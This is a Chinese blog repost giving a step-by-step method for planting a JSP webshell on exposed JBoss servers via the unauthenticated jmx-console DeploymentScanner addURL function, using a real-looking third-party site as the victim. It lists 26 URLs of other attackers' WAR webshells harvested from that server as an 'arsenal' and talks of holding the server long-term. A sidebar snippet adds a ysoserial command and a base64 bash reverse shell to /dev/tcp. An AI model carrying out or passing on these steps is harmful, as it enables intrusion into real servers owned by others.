利用JBoss漏洞拿webshell方法

最新推荐文章于 2025-10-13 14:50:37 发布
转载 最新推荐文章于 2025-10-13 14:50:37 发布 · 1.8w 阅读 · 3
文章标签:

#jboss #google #服务器 #测试 #jsp #搜索引擎

本文详细介绍了如何通过搜索JBoss平台的特定特征、访问网站进行漏洞测试、添加Webshell的war文件地址、应用修改使设置生效、充实武器库以及最终获得Webshell的过程。通过实践操作,获取服务器权限并对其进行升级和加固。
部署运行你感兴趣的模型镜像

 JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。

  一、信息收集与整理 1.使用漏洞特征进行搜索

  在Jboss的整个漏洞中一个显著的特征就是“8080/jmx-console/”,当然整个也还有其它特征,用这个特征主要便于在Google中进行搜索,现在使用google的搜索地址为:www.google.com.hk,使用百度搜索的效果不如Google。在Google的输入框中输入:inurl:”8080/jmx-console/” ,会出来一堆结果。

  2.访问网站并进行漏洞测试

  对搜索出来的记录一一进行查看,看看能否正常访问。由于搜索引擎的时效性,有些网站虽然结果在搜索结果中,但由于各种原因网站已经不能访问。如果网站不能正常访问就舍弃。从结果中我们找到http://oa.tsingtaobeer-sales.com:8080/jmx-console/网站能够正常访问,然后在该页面中搜索“jboss.deployment”,并找到* flavor=URL,type=DeploymentScanner,单击该链接看看能否正常访问,如图1所示。

  图1 测试Jboss页面

  3.添加Webshell的war文件地址

  将Jsp的shell压缩成war文件,然后将该war上传到互联网上能够访问的网站上,例如本例中的war的真实地址为“http://www.cam*****.com.hk/forum/forumdata/cache/war.war”。当前打开的页面地址为“http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL”,在该页面中去寻找“void addURL()”函数,找到后将“http://www.cam*****.com.hk/forum/forumdata/cache/cmd.war”复制“ParamValue”中,如图2所示,然后单击“invoke”将http://www.cam*****.com.hk/forum/forumdata/cache/war.war下载到本地服务器本进行部署。部署成功后会给出相应的提示,如图3所示。

  图2 利用addURL函数下载并部署war文件

  图3 操作执行成功

4.应用修改使设置生效

  再次回到主界面中,如图4所示,在URLList中会看到刚才加入的war地址,单击“Apply Change”使设置生效。

  图4应用修改使设置生效

  5.充实“武器库”

  通过观察URLList,发现该列表就是部署war的地址,如果通过前面的步骤在URLList中仅仅只有你自己的地址,那么恭喜你是第一个获取该服务器,在获取服务器的权限后可以对其进行升级和加固,升级和加固后,这个服务器以后就可能长期由你来“维护”和使用。在本例中将URLList中的值复制到记事本,然后进行整理,好家伙有26war文件。其war地址列表如下:

  http://116.232.230.228/xm.war

  http://117.67.0.248/wc.war

  http://121.207.250.24/war.zip

  http://121.207.250.24/war1.zip

  http://189.54.19.69:8181/cmd.war

  http://189.54.19.69:8181/h2010.war

  http://192.168.1.56:8080/System-Console/jsp/test.war

  http://203.246.56.27:8080/safe/safe.war

  http://210.51.25.183/icons/war.war

  http://221.137.124.253:8080/System-Console/jsp/job.jsp

  http://221.137.124.253:8080/System-Console/jsp/test.war

  http://61.178.73.149/job/no.war

  http://blog.avfree.cn/cmd.war

  http://blog.xiancn.com/Browser.war

  http://blog.xiancn.com/cmd.war

  http://jbosstest.webs.com/Browser.war

http://www.acclaimedenterprises.com/tmp/browser.war

  http://www.camgear.com.hk/forum/forumdata/cache/Browser.war

  http://www.cfblog.com/honeywell/war.war

  http://www.laodu.com.cn/ri/hack.war

  http://www.nmgfb.com/coody.war

  http://www.posumex.com/bdd/user/war.war

  http://www.str0m.cn/1.war

  http://www.yunxi.net/cmd.war

  http://yese.yi.org/cmd.war

  http://yese.yi.org/war/cmd.war

  依次访问这些地址,当然更有一个简单的办法复制这些地址将其粘贴在Flashget中,通过Flashget来下载。虽然这些地址中有些war无法下载,但通过对下载的war文件进行整理和分析,获取了4个好用的war文件,笔者在测试时就应用war文件问题,来回折腾了好几回都没有成功,换成获取的war文件就成功了,将这些好用的war归入武器库,充实弹药!

6.获得Webshell

  在浏览器中输入地址“http://oa.tsingtaobeer-sales.com:8080/war”测试Webshell能否正常访问,如图5所示,出来我们比较熟悉的JSP Webshell页面。需要特别注意的是,在部署过程中可能由于war文件和网站路径的不同,可能其访问地址会有一些偏差,因此需要多进行测试,有的直接可以访问有的需要加war包的名称。关于Jboss获取的详细细节感兴趣的朋友可以到www.antian365.com查看JBoss获取Webshell录像。

  图5 获得Webshell


您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

Jboss漏洞复现(附带修复方法
C233333235的博客
08-07 1859
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
Jboss】常见漏洞复现
m0_59151303的博客
08-06 2173
JBoss是一个基于J2EE的开发源代码的应用服务器JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Jboss漏洞利用小工具
09-01
Jboss漏洞利用的小工具。执行命令一次不行可以尝试多次执行
jboss漏洞 (CVE-2017-12149 )
最新发布
2401_87597240的博客
10-13 178
漏洞原因:JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。漏洞复现:只需要访问/invoker/readonly路径,如果页面返回500,说明漏洞存在。随后会在当前目录下生成一个.ser序列化数据流。到KALI机上监听端口,并发送数据包。然后添加反弹shell地址。接受反弹回的shell。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用
随记(七):Jboss漏洞检测利用工具
XXR_Beta的博客
12-06 5586
Jboss漏洞检测利用工具0x01 安装方法0x02 使用方法 Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。 工具下载:https://github.com/joaomatosf/jexboss 此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。 0x01 安装方法 ## 克隆项目至本地
Struts2及jboss漏洞利用工具
08-06
Struts2及jboss漏洞利用工具。非常好用本人几经尝试过。 Struts2的漏洞实用工具 ,以及jboss的jar cmd运行代码,良心出品
Jboss漏洞利用总结1
08-03
- 利用漏洞,攻击者通过调用后台的 `jboss.admin -> DeploymentFileRepository -> store()` 方法,通过四个参数(war 包名、文件名、文件格式和文件内容)上传 shell。 - 影响版本:JBoss 4.x 及以下。 - 利用...
50-webshell获取总结(cms获取方法、非cms获取方法、中间件拿Webshell方法
XLbb的博客
06-12 2357
一、主要通过百度搜索CMS网站程序名称。如:phpcms拿Webshell、WordPress后台拿Webshell等。 二、1、数据库备份获取Webshell 2、抓包上传获取Webshell 3、Sql命令获取Webshell 4、模板修改获取Webshell 5、插入一句话获取Webshell 6、修改上传类型获取Webshell 三、其它获取Webshell方法:中间件拿Webshell方法 cookices靶场网站搭建和dedecms靶场环境搭建
常见中间件漏洞(三、Jboss合集)
2301_76631050的博客
08-06 1384
JBoss是一个基于J2EE的开发源代码的应用服务器JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发这使得JBoss广为流行。
Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具
02-12
weblogic反序列化和jboss反序列化测试payload,仅供运维人员测试漏洞,请勿非法使用,否则后果自负!
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
jexboss工具 -- JBOSS未授权访问漏洞利用
qq_50854662的博客
10-30 576
其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱。。。 ----  网易云热评 小受:Ubuntu20 小攻:Kali2020   一、搭建该漏洞环境 查看上一篇文章: Ubuntu20安装docker并部署相关漏洞环境   二、访问http://192.168.77.136:8080/进...
Jboss漏洞利用
u011215939的博客
01-23 8773
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
jboss漏洞利用
mirror97black的博客
01-24 8438
JBOSS JBoss应用服务器JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。 使用工具 msf,jexboss,zoomeye,fofa 下载jexboss 在github中搜索jexboss下载漏洞利用代码
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1429
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
春秋靶场jboss
08-22
在春秋靶场中,针对 JBoss 漏洞的环境搭建与练习,通常涉及中间件漏洞利用、反序列化攻击以及未授权访问等常见安全问题。以下是关于 JBoss 漏洞环境搭建与练习的相关指南。 ### 漏洞环境搭建 1. **安装 JBoss 服务器** 在搭建 JBoss 漏洞环境时,首先需要下载并安装低版本的 JBoss 应用服务器。推荐使用 JBoss 4.x 或 JBoss 5.x 系列,因为这些版本存在多个已知漏洞,如 JMX Console 未授权访问漏洞(CVE-2017-7504)等。可以通过以下命令解压并启动 JBoss: ```bash unzip jboss-4.2.3.GA.zip cd jboss-4.2.3.GA/bin ./run.sh ``` 启动后,访问 `http://127.0.0.1:8080/jmx-console` 可以进入 JMX Console 管理界面[^1]。 2. **配置漏洞靶场** 为了模拟真实攻击场景,可以使用 Vulhub 或者手动配置靶场。Vulhub 是一个开源的漏洞靶场,支持一键部署多个中间件漏洞环境。在 Kali Linux 上,可以通过更换 APT 源来加速下载: ```bash echo "deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib" > /etc/apt/sources.list apt update && apt install docker docker-compose git clone https://github.com/vulhub/vulhub.git cd vulhub/jboss/CVE-2017-7504 docker-compose up -d ``` 这样即可一键部署 JBoss 反序列化漏洞环境[^4]。 ### 漏洞利用练习 1. **JMX Console 未授权访问漏洞** JBoss 默认配置中未启用身份验证,攻击者可以直接访问 JMX Console 并执行任意 MBean 操作。通过该漏洞,攻击者可以上传恶意 WAR 文件,进而获取服务器控制权。可以使用 `curl` 或浏览器访问 `http://127.0.0.1:8080/jmx-console`,并尝试部署一个包含 WebShell 的 WAR 文件。 2. **反序列化漏洞(CVE-2017-7504)** JBoss 使用了 Apache Commons Collections 库,该库在某些版本中存在反序列化漏洞。可以使用 `ysoserial` 工具生成恶意序列化数据,触发远程代码执行。例如: ```bash java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > exp.ser ``` 生成的 `exp.ser` 文件可用于向目标服务器发送恶意请求,从而实现反弹 Shell 控制[^3]。 3. **反弹 Shell 配置** 在利用漏洞时,通常需要配置反弹 Shell 以获取服务器权限。可以使用以下命令生成 Base64 编码的反弹 Shell: ```bash echo "bash -i >& /dev/tcp/192.168.10.190/6666 0>&1" | base64 ``` 生成的编码可用于构造恶意请求,确保攻击者能够通过指定 IP 和端口接收 Shell 控制[^2]。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值